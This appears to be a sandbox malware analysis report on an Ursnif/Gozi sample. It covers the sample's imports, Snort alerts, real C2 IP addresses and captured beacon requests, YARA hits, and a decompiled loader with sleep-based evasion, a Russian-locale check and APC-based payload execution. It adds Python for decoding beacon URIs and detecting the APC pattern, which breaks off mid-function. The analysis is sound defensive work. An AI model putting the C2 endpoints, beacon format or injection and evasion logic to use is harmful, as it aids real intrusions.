    RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Sweden
    RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Finland
    RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Norway
    RT_ACCELERATOR | 0xab4e0 | 0x78 | data | Sami Lappish | Sweden
    RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Finland
    RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Norway
    RT_ACCELERATOR | 0xab438 | 0xa8 | data | Sami Lappish | Sweden
    RT_GROUP_CURSOR | 0xac868 | 0x30 | data | |
    RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Finland
    RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Norway
    RT_GROUP_ICON | 0xa4ef0 | 0x30 | data | Sami Lappish | Sweden
    RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Finland
    RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Norway
    RT_GROUP_ICON | 0xa0fd0 | 0x22 | data | Sami Lappish | Sweden
    RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Finland
    RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Norway
    RT_GROUP_ICON | 0xaae38 | 0x68 | data | Sami Lappish | Sweden
    RT_VERSION | 0xac898 | 0x258 | data | |
    None | 0xab558 | 0xa | data | Sami Lappish | Finland
    None | 0xab558 | 0xa | data | Sami Lappish | Norway
    None | 0xab558 | 0xa | data | Sami Lappish | Sweden
    None | 0xab568 | 0xa | data | Sami Lappish | Finland
    None | 0xab568 | 0xa | data | Sami Lappish | Norway
    None | 0xab568 | 0xa | data | Sami Lappish | Sweden
    None | 0xab578 | 0xa | data | Sami Lappish | Finland
    None | 0xab578 | 0xa | data | Sami Lappish | Norway
    None | 0xab578 | 0xa | data | Sami Lappish | Sweden
    None | 0xab588 | 0xa | data | Sami Lappish | Finland
    None | 0xab588 | 0xa | data | Sami Lappish | Norway
    None | 0xab588 | 0xa | data | Sami Lappish | Sweden
DLL | Import
KERNEL32.dll | PulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, CopyFileExW, GetConsoleAliasExesA, _llseek, BuildCommDCBAndTimeoutsA, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, GetWindowsDirectoryA, EnumTimeFormatsA, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetCurrentDirectoryA, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, LocalAlloc, FindFirstVolumeMountPointW, AddAtomA, FindNextFileA, GetModuleHandleA, GetCPInfoExA, SetCalendarInfoA, DeleteFileW, EnumCalendarInfoExA, LocalFree, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, CreateFileW
USER32.dll | LoadMenuA
Language of compilation system | Country where language is spoken
Sami Lappish | Finland
Sami Lappish | Norway
Sami Lappish | Sweden
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-13:15:36.320401 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49705 | 80 | 192.168.2.6 | 193.233.175.113
03/20/23-13:15:16.126464 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49704 | 80 | 192.168.2.6 | 62.173.142.81
03/20/23-13:15:16.126464 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 13:15:16.062493086 CET | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Mar 20, 2023 13:15:16.122262955 CET | 80 | 49704 | 62.173.142.81 | 192.168.2.6
Mar 20, 2023 13:15:16.122481108 CET | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Mar 20, 2023 13:15:16.126463890 CET | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Mar 20, 2023 13:15:16.185555935 CET | 80 | 49704 | 62.173.142.81 | 192.168.2.6
Mar 20, 2023 13:15:16.186232090 CET | 80 | 49704 | 62.173.142.81 | 192.168.2.6
Mar 20, 2023 13:15:16.186345100 CET | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Mar 20, 2023 13:15:16.187962055 CET | 49704 | 80 | 192.168.2.6 | 62.173.142.81
Mar 20, 2023 13:15:16.247250080 CET | 80 | 49704 | 62.173.142.81 | 192.168.2.6
Mar 20, 2023 13:15:36.216483116 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.319710016 CET | 80 | 49705 | 193.233.175.113 | 192.168.2.6
Mar 20, 2023 13:15:36.319972038 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.320400953 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.423428059 CET | 80 | 49705 | 193.233.175.113 | 192.168.2.6
Mar 20, 2023 13:15:36.424657106 CET | 80 | 49705 | 193.233.175.113 | 192.168.2.6
Mar 20, 2023 13:15:36.424779892 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.424930096 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.739191055 CET | 49705 | 80 | 192.168.2.6 | 193.233.175.113
Mar 20, 2023 13:15:36.842247963 CET | 80 | 49705 | 193.233.175.113 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 13:13:55.859003067 CET | 49786 | 53 | 192.168.2.6 | 8.8.8.8
Mar 20, 2023 13:13:55.886168003 CET | 53 | 49786 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 13:13:55.859003067 CET | 192.168.2.6 | 8.8.8.8 | 0x5e5a | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 13:13:55.886168003 CET | 8.8.8.8 | 192.168.2.6 | 0x5e5a | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
          • 62.173.142.81
          • 193.233.175.113
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49704 | 62.173.142.81 | 80 | C:\Users\user\Desktop\Server.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 13:15:16.126463890 CET | 102 | OUT | GET /drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.81
          Connection: Keep-Alive
          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49705 | 193.233.175.113 | 80 | C:\Users\user\Desktop\Server.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 13:15:36.320400953 CET | 103 | OUT | GET /drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 193.233.175.113
          Connection: Keep-Alive
          Cache-Control: no-cache
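Both requests carry the beacon in the path itself, which is why the Snort signatures above key on the "_2B" and "_2F" URI structure: the bot base64-encodes an encrypted buffer, replaces "/" with "_2F" and "+" with "_2B", splits the result with path separators at arbitrary points, and appends a throwaway extension. The Python below is an added example, not part of the report or of the sample, that undoes this for the two captured paths. The detail that matters is ordering: the separators have to be removed before the escapes are expanded, because an escape can straddle a separator (second request: "...pO_2/F2s0..." and "...Y6_/2Fwm..."). Assumptions: the leading directory ("drew" in both requests) and the extension are fixed decoration rather than data, and the data is sent without base64 padding, which is what these two paths show. Nothing here recovers the plaintext; ISFB-family bots encrypt the beacon (typically Serpent in CBC mode) before encoding it, and the key is not in this report. Both paths decode to 208 bytes, a multiple of the 16-byte block size, which is consistent with that.

```python
import base64
import re

# The two request paths captured in this report's HTTP sessions (copied from the page).
URI_1 = "/drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk"
URI_2 = "/drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk"

# Escapes the bot applies to the base64 alphabet: the hex of '/' and '+',
# matching the "(_2F)" and "(_2B)" in the Snort rule names.
ESCAPES = {"_2F": "/", "_2B": "+"}


def normalize_uri(path: str, prefix_dirs: int = 1) -> str:
    """Turn an ISFB-style request path back into plain base64.
    1. drop the leading directory name(s) ("drew") and the fake extension (".jlk");
    2. remove the '/' separators the bot sprinkled into the data;
    3. only then expand _2F/_2B, because an escape may straddle a separator."""
    parts = [p for p in path.split("/") if p]
    data = "".join(parts[prefix_dirs:])
    data = data.rsplit(".", 1)[0]
    for esc, ch in ESCAPES.items():
        data = data.replace(esc, ch)
    return data


def decode_uri(path: str) -> bytes:
    """Base64-decode the normalized path. The result is still ciphertext: the
    beacon is encrypted before encoding and the key is not part of this report."""
    b64 = normalize_uri(path)
    if not re.fullmatch(r"[A-Za-z0-9+/]+", b64):
        raise ValueError("unexpected characters after un-escaping: %r" % b64)
    b64 += "=" * (-len(b64) % 4)  # no padding is sent; restore it for the decoder
    return base64.b64decode(b64)


if __name__ == "__main__":
    for name, uri in (("request 1", URI_1), ("request 2", URI_2)):
        blob = decode_uri(uri)
        print("%s: %d bytes, block-aligned: %s" % (name, len(blob), len(blob) % 16 == 0))
```

The alphabet check after un-escaping is deliberate: if a capture contains an escape this table does not know, the decoder refuses rather than silently dropping characters, which is what `base64.b64decode` would do by default.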


Target ID: 0
Start time: 13:13:41
Start date: 20/03/2023
Path: C:\Users\user\Desktop\Server.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Server.exe
Imagebase: 0x400000
File size: 182272 bytes
MD5 hash: 9565B4A15A8593EA3EC1F3C9D0A2E11A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low


            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
            				long _v8;
            				char _v12;
            				char _v16;
            				void* _v40;
            				long _t28;
            				long _t30;
            				long _t31;
            				signed short _t33;
            				void* _t37;
            				long _t40;
            				long _t41;
            				void* _t48;
            				intOrPtr _t50;
            				signed int _t57;
            				signed int _t58;
            				long _t63;
            				long _t65;
            				intOrPtr _t66;
            				void* _t71;
            				void* _t75;
            				signed int _t77;
            				signed int _t78;
            				void* _t82;
            				intOrPtr* _t83;
            
            				_t28 = E00401D68();
            				_v8 = _t28;
            				if(_t28 != 0) {
            					return _t28;
            				}
            				do {
            					_t77 = 0;
            					_v12 = 0;
            					_t63 = 0x30;
            					do {
            						_t71 = E004012E6(_t63);
            						if(_t71 == 0) {
            							_v8 = 8;
            						} else {
            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            							_t67 = _t57;
            							_t58 = _t57 & 0x0000ffff;
            							_v8 = _t58;
            							if(_t58 == 4) {
            								_t63 = _t63 + 0x30;
            							}
            							_t78 = 0x13;
            							_t10 = _t67 + 1; // 0x1
            							_t77 =  *_t71 % _t78 + _t10;
            							E00401BA9(_t71);
            						}
            					} while (_v8 != 0);
            					_t30 = E00401688(_t77); // executed
            					_v8 = _t30;
            					Sleep(_t77 << 4); // executed
            					_t31 = _v8;
            				} while (_t31 == 0x15);
            				if(_t31 != 0) {
            					L30:
            					return _t31;
            				}
            				_v12 = 0;
            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            				if(_t33 == 0) {
            					__imp__GetSystemDefaultUILanguage();
            					_t67 =  &_v12;
            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            				}
            				if(_v12 == 0x5552) {
            					L28:
            					_t31 = _v8;
            					if(_t31 == 0xffffffff) {
            						_t31 = GetLastError();
            					}
            					goto L30;
            				} else {
            					if(E00401800(_t67,  &_v16) != 0) {
            						 *0x404178 = 0;
            						L20:
            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            						_t82 = _t37;
            						if(_t82 == 0) {
            							L27:
            							_v8 = GetLastError();
            							goto L28;
            						}
            						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            						if(_t40 == 0) {
            							_t65 = GetLastError();
            							TerminateThread(_t82, _t65);
            							CloseHandle(_t82);
            							_t82 = 0;
            							SetLastError(_t65);
            						}
            						if(_t82 == 0) {
            							goto L27;
            						} else {
            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
            							_v8 = _t41;
            							if(_t41 == 0) {
            								GetExitCodeThread(_t82,  &_v8);
            							}
            							CloseHandle(_t82);
            							goto L28;
            						}
            					}
            					_t66 = _v16;
            					_t83 = __imp__GetLongPathNameW;
            					_t48 =  *_t83(_t66, 0, 0); // executed
            					_t75 = _t48;
            					if(_t75 == 0) {
            						L18:
            						 *0x404178 = _t66;
            						goto L20;
            					}
            					_t22 = _t75 + 2; // 0x2
            					_t50 = E004012E6(_t75 + _t22);
            					 *0x404178 = _t50;
            					if(_t50 == 0) {
            						goto L18;
            					}
            					 *_t83(_t66, _t50, _t75); // executed
            					E00401BA9(_t66);
            					goto L20;
            				}
            			}

(Per-line address column of the report's side-by-side view, 0x004019f7 to 0x00401ba8; not reproduced here.)

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
Memory Dump Source
• Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%
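The routine above is the unpacked loader's entry logic, and its constants read as follows. NtQuerySystemInformation is called with class 8 (SystemProcessorPerformanceInformation) and a buffer grown by 0x30 bytes, one SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION entry, for as long as the low word of the status is 4 (STATUS_INFO_LENGTH_MISMATCH is 0xC0000004); the first DWORD of the result modulo 0x13 then seeds a Sleep, which is the "may stop execution after checking system information" behaviour flagged in the signatures. GetLocaleInfoA(0x400, 0x5a, buf, 4) is LOCALE_USER_DEFAULT with LOCALE_SISO3166CTRYNAME, so buf receives the two-letter ISO country code, and the function returns without doing anything further when the buffer read as a little-endian DWORD equals 0x5552, which is the string "RU". Otherwise it creates a thread whose start routine is SleepEx and queues E0040139F to it with QueueUserAPC, so the payload runs as an APC delivered inside an alertable wait rather than as a thread start address; note that SleepEx and GetLongPathNameW are referenced here through import thunks although neither appears in the static import table above, consistent with the "overwrites its own PE header" unpacking signatures. The Python below is an added example, not part of the report or the sample: it verifies the "RU" constant and runs a detection for the thread/APC pattern over a constructed API trace in a made-up one-call-per-line format. pid 5744, the SleepEx start routine and the APC target 0x0040139F are taken from the report; handles, timestamps, the other addresses and the decoy process 6100 are invented.

```python
import re

# Thread start routines that only wait in an alertable state. A thread created on one of
# these and then handed a user APC runs the APC, not the start routine. The list is an
# assumption of this example; the report itself only shows the SleepEx case.
ALERTABLE_WAIT_EXPORTS = {
    "KERNEL32.SleepEx", "KERNELBASE.SleepEx",
    "KERNEL32.WaitForSingleObjectEx", "KERNEL32.WaitForMultipleObjectsEx",
    "NTDLL.NtDelayExecution", "NTDLL.NtWaitForSingleObject", "NTDLL.NtTestAlert",
}


def country_dword(code: str) -> int:
    """GetLocaleInfoA(LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME, buf, 4) writes a
    NUL-terminated ISO 3166 code into a 4-byte buffer; the decompiled code reads that
    buffer as one little-endian DWORD and compares it with 0x5552."""
    return int.from_bytes(code.encode("ascii").ljust(4, b"\0"), "little")


# Constructed API trace (not Joe Sandbox's format). pid 5744, the SleepEx start routine
# and the APC target 0x40139f come from the report; everything else is invented.
TRACE = """\
13:13:41.902 pid=5744 GetLocaleInfoA(Locale=0x400, LCType=0x5a, lpLCData=0x19fe74, cchData=4) -> 3
13:13:41.903 pid=5744 GetLongPathNameW(lpszShortPath=0x4e6a10, lpszLongPath=0x0, cchBuffer=0) -> 38
13:13:41.905 pid=5744 CreateThread(lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x76b3c740[KERNEL32.SleepEx], lpParameter=0xffffffff, dwCreationFlags=0x0, lpThreadId=0x0) -> 0x2a8
13:13:41.905 pid=5744 QueueUserAPC(pfnAPC=0x40139f, hThread=0x2a8, dwData=0x19fe58) -> 1
13:13:41.906 pid=5744 WaitForSingleObject(hHandle=0x2a8, dwMilliseconds=0xffffffff) -> 0
13:13:41.950 pid=6100 CreateThread(lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401000[Server.exe+0x1000], lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0) -> 0x1f4
13:13:41.951 pid=6100 QueueUserAPC(pfnAPC=0x401200, hThread=0x1f4, dwData=0x0) -> 1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>.*)\)\s*->\s*(?P<ret>\S+)$"
)
ARG_RE = re.compile(r"(\w+)=([^,\s]+)")


def parse_line(line: str):
    """Split one trace line into timestamp, pid, API name, argument dict and return value."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["args"] = dict(ARG_RE.findall(rec["args"]))
    return rec


def start_symbol(value: str) -> str:
    """'0x76b3c740[KERNEL32.SleepEx]' -> 'KERNEL32.SleepEx'; a bare address gives ''."""
    return value.split("[", 1)[1].rstrip("]") if "[" in value else ""


def find_apc_hijacks(lines):
    """Return (pid, thread handle, start routine, APC address) for every thread that was
    created on an alertable-wait export and then targeted by QueueUserAPC. State is kept
    per (pid, handle) and dropped once the handle is closed or the thread terminated."""
    pending = {}
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        pid, api, args = rec["pid"], rec["api"], rec["args"]
        if api == "CreateThread":
            sym = start_symbol(args.get("lpStartAddress", ""))
            if sym in ALERTABLE_WAIT_EXPORTS and rec["ret"] != "0x0":
                pending[(pid, rec["ret"])] = sym
        elif api == "QueueUserAPC":
            key = (pid, args.get("hThread"))
            if key in pending:
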